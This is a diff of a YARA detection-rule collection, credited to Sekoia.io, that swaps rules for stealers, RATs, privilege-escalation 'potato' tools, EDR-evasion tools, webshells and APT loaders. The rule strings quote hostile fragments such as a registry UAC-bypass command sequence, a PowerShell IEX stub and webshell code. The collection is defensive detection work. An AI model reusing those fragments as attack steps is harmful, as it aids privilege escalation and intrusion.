+		logic_hash = "fe9b02704d07b5ebe6ad94283e4c1ec2846a54f5c1fb2115a1f6411cf8c19059"
 		score = 75
-		quality = 55
-		tags = ""
+		quality = 80
+		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "upd100.appspot.com/update/u.zip" ascii fullword
-		$s2 = "Unzip ok" ascii fullword
-		$s3 = "Installing update" ascii fullword
-		$s4 = "Administrators" ascii fullword
-		$s5 = "I am not admin" ascii fullword
-		$s6 = "I am admin" ascii fullword
-		$s7 = "ScreenConnect.ClientSetup.exe" ascii fullword
-		$s8 = "for %%x in (%IPS%) do (" ascii fullword
+		$s1 = "RunasCs" ascii wide
+		$s2 = "LOGON32_LOGON_INTERACTIVE" ascii wide
+		$s3 = "LOGON32_LOGON_NETWORK" ascii wide
+		$s4 = "LOGON32_LOGON_BATCH" ascii wide
+		$s5 = "LOGON32_LOGON_SERVICE" ascii wide
+		$s6 = "dwLogonProvider" ascii wide
+		$s7 = "LogonUser" ascii wide
+		$s8 = "CreateProcessAsUser" ascii wide
 
 	condition:
-		6 of them
+		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize < 4MB and all of them and not ( pe.version_info [ "OriginalFilename" ] == "Atera.AgentPackages.CommonLib.dll" and for any sig in pe.signatures : ( sig.subject contains "CN=Atera Networks Ltd" and sig.issuer contains "CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1" ) )
 }
-rule SEKOIA_Infostealer_Win_Enigma_Initial_Loader : FILE
+rule SEKOIA_Tool_Juicypotato_Exploit_Strings : FILE
 {
 	meta:
-		description = "Find initial loader of Enigma Stealer based on specific strings"
+		description = "Detects the JuicyPotato exploit based on strings"
 		author = "Sekoia.io"
-		id = "664fe8de-b406-4d63-9a4b-1c350b444f00"
-		date = "2023-01-30"
+		id = "03d697ae-69a7-490b-8b3c-9a8c21fb46a2"
+		date = "2022-09-09"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/infostealer_win_enigma_initial_loader.yar#L1-L24"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		hash = "03b9d7296b01e8f3fb3d12c4d80fe8a1bb0ab2fd76f33c5ce11b40729b75fb23"
-		logic_hash = "b7687a480a2a633e7cc9a60d62f3392011712bd018ed634927419cfb4edb4a78"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/tool_juicypotato_exploit_strings.yar#L1-L25"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "ef23ea2931a1b6e094c0d7bb813305c09a2214ce36680ae057926dfdc1105c80"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -246710,61 +247219,67 @@ rule SEKOIA_Infostealer_Win_Enigma_Initial_Loader : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str01 = "/getFile?file_id=" ascii
-		$str02 = "/file/bot" ascii
-		$str03 = "?file_id=" ascii
-		$str04 = "pInternetSetOptionA failed" wide
-		$str05 = "list_messages[file_path] failed" wide
-		$str06 = "iE&xit" wide
-		$str07 = "[GetTgFileById][GetTgRequest] reply is NULL" wide
-		$str08 = "Telegram request failed" wide
-		$str09 = "bot getted" wide
+		$ = "JuicyPotato v%s"
+		$ = "-t createprocess call: <t> CreateProcessWithTokenW"
+		$ = "-p <program>: program to launch"
+		$ = "-l <port>: COM server listen port"
+		$ = "-m <ip>: COM server listen address"
+		$ = "-n <port>: RPC server listen port"
+		$ = "Error - Unknown NTLM message type..."
+		$ = "[+] authresult %d"
+		$ = "Waiting for auth..."
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 4 of them
+		uint16be( 0 ) == 0x4d5a and filesize < 500KB and 2 of them
 }
-
-rule SEKOIA_Apt_Mustangpanda_Maliciousdll_Loading_Plugx_Strings
+rule SEKOIA_Rat_Win_Babylon : FILE
 {
 	meta:
-		description = "Detects MustangPanda malicious DLL"
+		description = "Finds Babylon RAT samples based on specific strings"
 		author = "Sekoia.io"
-		id = "2296ac6e-63f5-4cff-aeb7-2c5205e6f559"
-		date = "2023-12-18"
+		id = "ba9ab80a-ad7e-4746-aff2-9328440cbb25"
+		date = "2023-08-22"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_mustangpanda_maliciousdll_loading_plugx_strings.yar#L3-L23"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		hash = "651c096cf7043a01d939dff9ba58e4d69f15b2244c71b43bedb4ada8c37e8859"
-		logic_hash = "667901d36585248a891b90ff8ed7006030151fbbbe0d4a85570944a94edba7f8"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/rat_win_babylon.yar#L1-L27"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "142f10e519561d6552c9cb8d267280b9ede203a2f4723d904ab07217b0565bd1"
 		score = 75
 		quality = 80
-		tags = ""
+		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "VirtualAlloc"
-		$ = "VirtualFree"
-		$ = "VirtualProtect"
-		$ = "VirtualQuery"
-		$ = "GCC: (MinGW-W64"
+		$str01 = "ParadoxRAT_Client" ascii
+		$str02 = "*** in database %s ***" ascii
+		$str03 = "\\drivers\\etc\\HOSTS" ascii
+		$str04 = "Babylon RAT Client" wide
+		$str05 = "ClipBoard.txt" wide
+		$str06 = "a,ccs=UTF-16LE" wide
+		$str07 = "[%02d/%02d/%d %02d:%02d:%02d] [%s] (%s):" wide
+		$str08 = "Update Failed [OpenProcess]..." wide
+		$str09 = "DoS Already Active..." wide
+		$str10 = "File Download and Execution Failed..." wide
+		$str11 = "LgDError33x98dGetProcAddress" wide
+		$str12 = "FriendlyName" wide
+		$str13 = "@SPYNET" wide
 
 	condition:
-		pe.exports( "MsiProvideQualifiedComponentW" ) and all of them
+		uint16( 0 ) == 0x5a4d and 8 of ( $str* )
 }
-rule SEKOIA_Tool_Win_Forkplayground : FILE
+rule SEKOIA_Tool_Edrsandblast_Strings : FILE
 {
 	meta:
-		description = "Detect the ForkPlayground malware"
+		description = "Detects EDRSandblast strings"
 		author = "Sekoia.io"
-		id = "ec9af403-7647-447d-af17-c6931363a166"
-		date = "2023-02-28"
+		id = "7059b89c-80b5-4768-b3eb-02f173f628b0"
+		date = "2024-01-08"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/tool_win_forkplayground.yar#L1-L20"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "23d93b7eef978f76c9aa6c0bc28a661d160b0a871fd320442b6c27bc92bc279e"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/tool_edrsandblast_strings.yar#L1-L29"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "8528c4c440734ba97b98b6e0857d95f38a91eaf9120ba2eacff292c864fb86a5"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -246772,31 +247287,35 @@ rule SEKOIA_Tool_Win_Forkplayground : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "Failed to open dump file %s with the last error %i."
-		$ = "Successfully dumped process %i to %s"
-		$ = "ForkPlayground"
-		$ = "Second attempt at taking a snapshot of the target failed. It is likely that there is a difference in process privilege or the handle was stripped."
-		$ = "Failed to take a snapshot of the target process. Attempting to escalate debug privilege..."
-		$ = "Failed to escalate debug privileges, are you running ForkDump as Administrator"
+		$ = "[!] Cred Guard bypass failed: obtained invalid" wide
+		$ = "[!] Cred Guard bypass non fatal error:" wide
+		$ = "[+] Successfully overwrote wdigest's g_fParameter_UseLogonCredential" wide
+		$ = "[!] ERROR: could not allocate memory for the handl" wide
+		$ = "[+] [ProcessProtection] Found the handle of the current" wide
+		$ = "[+] [ProcessProtection] Found self process EPROCCES struct at" wide
+		$ = "ETW Threat Intel ProviderEnableInfo address could not be found." wide
+		$ = "The ETW Threat Intel provider was successfully" wide
+		$ = "[+] [NotifyRountines]" wide
+		$ = "[callback addr: 0x" wide
+		$ = "EDR / security products driver(s)" wide
+		$ = "Object callback offsets not loaded ! Aborting..." wide
+		$ = "No more space to store object callbacks !!" wide
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 1 of them
+		uint16be( 0 ) == 0x4d5a and filesize < 1MB and 3 of them
 }
-
-rule SEKOIA_Loader_Win_Abcloader : FILE
+rule SEKOIA_Tool_Juicypotatong_Strings : FILE
 {
 	meta:
-		description = "Detect ABCloader"
+		description = "Detects JuicyPotatoNG"
 		author = "Sekoia.io"
-		id = "c286ce75-a041-478e-a567-4bf1d5e66c01"
-		date = "2024-08-19"
+		id = "4634251b-ea41-4f58-aabd-db83ccf4edaa"
+		date = "2023-06-20"
 		modified = "2024-12-19"
-		reference = "https://nsfocusglobal.com/new-apt-group-actor240524-a-closer-look-at-its-cyber-tactics-against-azerbaijan-and-israel/"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/loader_win_abcloader.yar#L4-L28"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		hash = "0d1dca5eaad49c2dbd979e1bf0b5f8d0"
-		hash = "9a640889e82407b06c546fea15be668f"
-		logic_hash = "64d171d31c2f03ac18dde61d5b57fba91448045404b0ff619fb8cd437a561b1f"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/tool_juicypotatong_strings.yar#L1-L17"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "7014b206b293c8254304d97bec7b367c6039566f60511a51d4a41d3e1ed98612"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -246804,24 +247323,25 @@ rule SEKOIA_Loader_Win_Abcloader : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "qSii.LI4"
-		$ = "Cabinet.dll"
+		$ = "[!] CryptStringToBinaryW failed with error code %d" ascii
+		$ = "-b : Bruteforce all CLSIDs. !ALERT:" ascii
+		$ = "[-] CreateProcessWithTokenW Failed to create proc: %d" ascii
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and all of them or pe.imphash ( ) == "45c6b272631aa9e0c4b2ba675699b803" or hash.md5 ( pe.rich_signature.clear_data ) == "b33158757dc039859e272f4528e10e80"
+		uint16be( 0 ) == 0x4d5a and all of them
 }
-rule SEKOIA_Apt_Mustangpanda_Windows_Shellcode_Decryptionalgorithm : FILE
+rule SEKOIA_Tool_Godpotato : FILE
 {
 	meta:
-		description = "Decryption routine for Shellcode of MustangPanda"
+		description = "No description has been set in the source file - SEKOIA"
 		author = "Sekoia.io"
-		id = "c9873a5f-97a6-477f-a1a0-650441c73444"
-		date = "2022-12-05"
+		id = "cc396771-f187-43ae-903f-147d15483c46"
+		date = "2023-08-23"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_mustangpanda_windows_shellcode_decryptionalgorithm.yar#L1-L28"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "a2ad3bd4dcbee3e23762b674ee8b6717e7ece712b0128145518bfa5d2e4bd66a"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/tool_godpotato.yar#L1-L23"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "ea182b187fcd1ba61d3e2d10a689cf0212267dede1342e817e47551506a780ab"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -246829,35 +247349,30 @@ rule SEKOIA_Apt_Mustangpanda_Windows_Shellcode_Decryptionalgorithm : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$chunk_1 = {
-        7E ??
-        8B 55 ??
-        53
-        56
-        8B 75 ??
-        57
-        8B 7D ??
-        4F
-        8D A4 24 ?? ?? ?? ??
-        8A 1C 11
-        30 1C 30
-        }
+		$s1 = "[!] Cannot create process Win32Error:{0}" ascii wide
+		$s2 = "[*] process start with pid {0}" ascii wide
+		$s3 = "MEOW" ascii wide
+		$s4 = "2ae886c3-3272-40be-8d3c-ebaede9e61e1" ascii wide
+		$s5 = "GodPotatoUnmarshalTrigger" ascii wide
+		$s6 = "GodPotato.exe" ascii wide
+		$s7 = "GodPotato.exe" wide
 
 	condition:
-		filesize < 8MB and all of them
+		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize < 4MB and all of them
 }
-rule SEKOIA_Apt_Implant_Xdealer_Vbs_Launcher_Strings : FILE
+rule SEKOIA_Trojan_Win_Bbtok_Dll1_Sep23 : FILE
 {
 	meta:
-		description = "Detects XDealer VBS Launcher"
+		description = "Finds BBTok installation DLL file"
 		author = "Sekoia.io"
-		id = "ebfc8a33-70dc-44d5-bc4a-07afc56f8254"
-		date = "2024-03-22"
+		id = "eebed24b-24ec-4a85-852c-52d0acc9a698"
+		date = "2023-09-26"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_implant_xdealer_vbs_launcher_strings.yar#L1-L17"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "e206189fd21ed7b3bf48a51d955df9055b7f7aa502b7fac52b274cc414adea0d"
+		reference = "https://research.checkpoint.com/2023/behind-the-scenes-of-bbtok-analyzing-a-bankers-server-side-components/"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/trojan_win_bbtok_dll1_sep23.yar#L1-L28"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		hash = "5353956345206982af9bde55300fc405ba6e40722e8f51e8717c30ad32bc8f91"
+		logic_hash = "1b1e25f7d760d275d2ef01390c215edb1752ad65383c92a21d71d9e65da3c5f8"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -246865,50 +247380,63 @@ rule SEKOIA_Apt_Implant_Xdealer_Vbs_Launcher_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "Dim objws"
-		$s2 = "Set objws="
-		$s3 = "objws.Run \"\"\"C:\\ProgramData\\"
+		$str01 = "C:\\Windows\\System32\\rundll32.exe" wide
+		$str02 = "C:\\ProgramData\\mmd.exe" wide
+		$str03 = "REG ADD HKCU\\Software\\Classes\\.pwn\\Shell\\Open\\command -ve /d" wide
+		$str04 = "C:\\ProgramData\\mmd.exe \\\\" wide
+		$str05 = "\\file\\Trammy.dll" wide
+		$str06 = "Dacl & REG DELETE HKCU\\Software\\Classes\\ms-settings /f" wide
+		$str07 = "REG DELETE  HKCU\\Software\\Classes\\.pwn /f" wide
+		$str08 = "REG ADD HKCU\\Software\\Classes\\ms-settings\\CurVer -ve /d \".pwn\" /f" wide
+		$str09 = "timeout /t 3 >nul & start /MIN computerdefaults.exe" wide
+		$str10 = "set_StartInfo" ascii
+		$str11 = "set_WindowStyle" ascii
 
 	condition:
-		$s1 at 0 and all of them and filesize < 200
+		uint16( 0 ) == 0x5a4d and 7 of them and filesize < 50KB
 }
-rule SEKOIA_Backdoor_Powershellempire_Gen : FILE
+rule SEKOIA_Webshell_Wso_Webshell_Strings
 {
 	meta:
-		description = "Detects EmpirePowershell"
+		description = "Detects the WSO webshells"
 		author = "Sekoia.io"
-		id = "36050a5b-bdca-45cd-8e26-7129fdcbf1e8"
-		date = "2022-04-15"
+		id = "84340792-73a4-4d61-9957-6cfa1f6444a7"
+		date = "2022-04-22"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/backdoor_powershellempire_gen.yar#L1-L16"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "21f255bcfb6da2aa996ed61ff5fb29a9355de6169095f7c3141a1b7f3cea5c2d"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/webshell_wso_webshell_strings.yar#L1-L20"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "4d6966a34dc8e7390913857144da106affea14668d1c2c11a05be62a6e625c8f"
 		score = 75
-		quality = 76
-		tags = "FILE"
+		quality = 80
+		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "%{$J=($J+$S[$_]+$K[$_%$K.COUNt])%256;" nocase wide ascii
-		$ = "($IV+$K))|IEX" nocase wide ascii
+		$ = "decrypt($str,$pwd){$pwd=base64_encode($pwd);"
+		$ = "prototype(md5($_SERVER['HTTP_HOST'])"
+		$ = "$_COOKIE[md5($_SERVER['HTTP_HOST'])."
+		$ = "set(a,c,p1,p2,p3,charset)"
+		$ = "(($p & 0x0008) ? (($p & 0x0400)"
+		$ = "gcc','lcc','cc','ld','make','php"
 
 	condition:
-		all of them and filesize < 1MB
+		3 of them
 }
-rule SEKOIA_Malware_Sugargh0St_Strings : FILE
+
+rule SEKOIA_Apt_Nobelium_Nativezone_Gen : FILE
 {
 	meta:
-		description = "Detects SugarGh0st based on strings"
+		description = "Detects NativeZone used in 2022"
 		author = "Sekoia.io"
-		id = "51930498-b04a-4f13-8d14-ee975a28126e"
-		date = "2023-12-01"
+		id = "e16cac97-38dd-4145-95f5-cf641940a19b"
+		date = "2022-02-25"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/malware_sugargh0st_strings.yar#L1-L20"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "b878b5d3b3f62952d79c0ea5811838f4e79302b85f25494e91dc730dec8e1d8d"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_nobelium_nativezone_gen.yar#L3-L31"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "63ad9fc510541f98237fa5b254dc4a147539cbf485b2889d97bf3b619c3db3ae"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -246916,73 +247444,54 @@ rule SEKOIA_Malware_Sugargh0St_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "%sd.%s /c \"%s\"" wide
-		$ = "[Num Lock]" wide
-		$ = "#32770" wide
-		$ = "]%s (%4d-%02d-%02d %02d:%02d:%02d)" wide
+		$rich = { 52 69 63 68 [4] 00 }
+		$obs = { C7 85 [8] C7 85 }
+		$nobs = { C7 85 [6] 00 00 C7 85 }
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 100KB and all of them
+		pe.DLL and filesize < 2500KB and pe.number_of_exports > 20 and pe.number_of_imports < 30 and ( pe.imports ( "kernel32.dll" , "VirtualAlloc" ) and pe.imports ( "kernel32.dll" , "VirtualProtect" ) ) and for any i in ( 0 .. pe.number_of_sections - 1 ) : ( pe.sections [ i ] . name == ".rdata" and pe.sections [ i ] . raw_data_size > 300000 ) and #obs > 300 and #nobs < 150 and not $rich
 }
-rule SEKOIA_Apt_Kimsuky_Sharpext_Jsexfil_Strings : FILE
+rule SEKOIA_Apt_Apt_K_47_Orpcbackdoor : FILE
 {
 	meta:
-		description = "Detects the exfiltration JS code of SharpExt"
+		description = "Detects ORPCBackdoor used by APT-K-47"
 		author = "Sekoia.io"
-		id = "c9ebd123-6450-4424-93d1-60322bd97bf6"
-		date = "2022-07-29"
+		id = "9768371d-763f-45df-b727-ccda97501aaa"
+		date = "2024-02-14"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_kimsuky_sharpext_jsexfil_strings.yar#L1-L18"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "37ea72b369baaced89f30f655901cc4a9d6a70d00cfca3b92a1015aca64d4e2c"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_apt_k_47_orpcbackdoor.yar#L1-L20"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "4a05e68eca0954e3bca5ebec6c63bf0535051f8d99f65940b7ed00f49e659f2d"
 		score = 75
-		quality = 80
+		quality = 55
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "var req_url" ascii fullword
-		$ = "var newReqId" ascii fullword
-		$ = "chrome.tabs.query" ascii fullword
-		$ = "payload.message.flags = new Object();" ascii fullword
+		$s1 = "RegisteredOrganization:\t\t\t" ascii wide
+		$s2 = "To Be Filled By O.E.M" ascii wide
+		$s3 = ">> "
+		$s4 = "HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\%u" wide
+		$s5 = "Error! GetSystemDirectory failed."
+		$s6 = "Domain:\t\t\t\t"
 
 	condition:
-		all of them and filesize < 50KB
+		all of them and filesize < 300KB and uint16be( 0 ) == 0x4d5a
 }
-rule SEKOIA_Apt_Toneshell_Loader : FILE
+rule SEKOIA_Apt_Tortoiseshell_Imaploader : FILE
 {
 	meta:
-		description = "Detects loader of ToneShell (exception based)"
+		description = "Detects IMAPLoader malware"
 		author = "Sekoia.io"
-		id = "b4bf284b-cab6-455e-a1c1-ad341d43bfdd"
-		date = "2024-10-02"
+		id = "e1706b59-5c94-4fbf-8560-0022ca631d1d"
+		date = "2023-11-13"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_toneshell_loader.yar#L1-L40"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		hash = "41e0d172d900344a3692b88fff7527d9"
-		hash = "782cf7183735935f3f7aad041cec3184"
-		hash = "97c1f436028c58b51d4c92ee9c9ce424"
-		hash = "d6c771f2afd8ce35e8727f95f3a3c6c4"
-		hash = "b8520c5bad88ade394086cb7b1b7b631"
-		hash = "0b3e8571e70a32490da19f6b3283151c"
-		hash = "f6784c65ee115a9ae4c0fb03e0045285"
-		hash = "38888696e5223c77f5f8680922396123"
-		hash = "b52d0707e4e5d5c0d5fd5f5a177ba712"
-		hash = "fd54c6d17ff91640b377ff41353efdaa"
-		hash = "a6efe263acc794a212647a96e52ddf1f"
-		hash = "6e8c80c5f2f9a1da504618e984d2a56c"
-		hash = "0839666697ccc562a9c1fe77d6755931"
-		hash = "f367f2fe580e556176b60da202c742a5"
-		hash = "e8b2fcc14494ada2f28d1f6ecd2521a2"
-		hash = "c08589e10812cc7d636dcbe2a36d43b4"
-		hash = "fa848a05cfecc0c25cd21364c9516584"
-		hash = "be231f7879d8d2159b67b7f277527268"
-		hash = "2acd8b48202dcc30d88a871370c4f37a"
-		hash = "72963bfc2837695f038680471d4f061c"
-		logic_hash = "40e1b918a4d83a4918260d8b1cc56e5097665a366f94bd5068e4ae519e3a681b"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_tortoiseshell_imaploader.yar#L1-L19"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "93f57940ed69145064e5153cc9b099fb9456116cae808acfb4e6f7f14003dde7"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -246990,27 +247499,26 @@ rule SEKOIA_Apt_Toneshell_Loader : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$exception = {00 00 00 00 2e 44 00 00}
-		$code = {02 00 00 00 66 89 96}
-		$kernel32 = "Kernel32.dll" wide
-		$outputdbgstr = "OutputDebugStringA"
-		$content = "ResetEvent"
+		$s1 = "yandex.com"
+		$s2 = "saveImapMessage.pdb"
+		$s3 = "downloader"
+		$s4 = "MailServer.Auth"
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and all of them and filesize < 2MB
+		filesize < 1MB and 3 of them
 }
-rule SEKOIA_Tool_Win_Gosecretsdump : FILE
+rule SEKOIA_Infostealer_Win_Nekostealer : FILE
 {
 	meta:
-		description = "Finds gosecretsdump EXE based on strings"
+		description = "Detect the NekoStealer infostealer based on specific strings"
 		author = "Sekoia.io"
-		id = "9225fe95-e37c-48ff-b5b5-680f255349bd"
-		date = "2024-06-10"
+		id = "8b7d2708-9d33-4855-8e02-f6afedb7dda8"
+		date = "2023-01-24"
 		modified = "2024-12-19"
-		reference = "https://github.com/C-Sto/gosecretsdump/releases"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/tool_win_gosecretsdump.yar#L1-L27"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "957b0deae745e4fda5a790acc391cebf9d193efb2a19ad5eb18c54da8c17bcfa"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/infostealer_win_nekostealer.yar#L1-L20"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "f027775bebb48ceb128392040ec2ac8ad84f2a2009760c040e4d376c2f06b663"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -247018,221 +247526,194 @@ rule SEKOIA_Tool_Win_Gosecretsdump : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str01 = "github.com/C-Sto/gosecretsdump" ascii
-		$str02 = "/pkg/esent" ascii
-		$str03 = "/pkg/ditreader" ascii
-		$str04 = "/pkg/samreader" ascii
-		$str05 = "ntdsFileLocation" ascii
-		$str06 = "NTDSLoc" ascii
-		$str07 = "SAMEntries" ascii
-		$str08 = "SAMHashAES" ascii
-		$str09 = "NTLMHash" ascii
-		$str10 = "HasNoLMHashPolicy" ascii
-		$str11 = "PreviousIncBackup" ascii
-		$str12 = "Esent_record" ascii
+		$nek = "NekoStealer.Stealing" ascii
+		$str01 = "\\Local Storage\\leveldb" wide
+		$str02 = "======================= Discord Tokens =======================" wide
+		$str03 = "======================== IP Information ========================" wide
+		$str04 = "https://ipapi.co/" wide
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 7 of them
+		uint16( 0 ) == 0x5A4D and ( #nek > 10 or all of ( $str* ) )
 }
-rule SEKOIA_Downloader_Mac_Rustbucket : FILE
+rule SEKOIA_Loader_Win_Konni_Wpnprv : FILE
 {
 	meta:
-		description = "RustBucket fake PDF reader"
+		description = "Detect the wpnprv DLLs used for KONNI for UAC bypass"
 		author = "Sekoia.io"
-		id = "5a003b68-ad9a-47f9-b157-dd898181dac2"
-		date = "2023-04-24"
+		id = "02162533-4ace-42bf-8df0-38b140487f01"
+		date = "2023-09-26"
 		modified = "2024-12-19"
-		reference = "https://www.jamf.com/blog/bluenoroff-apt-targets-macos-rustbucket-malware/"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/downloader_mac_rustbucket.yar#L1-L31"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
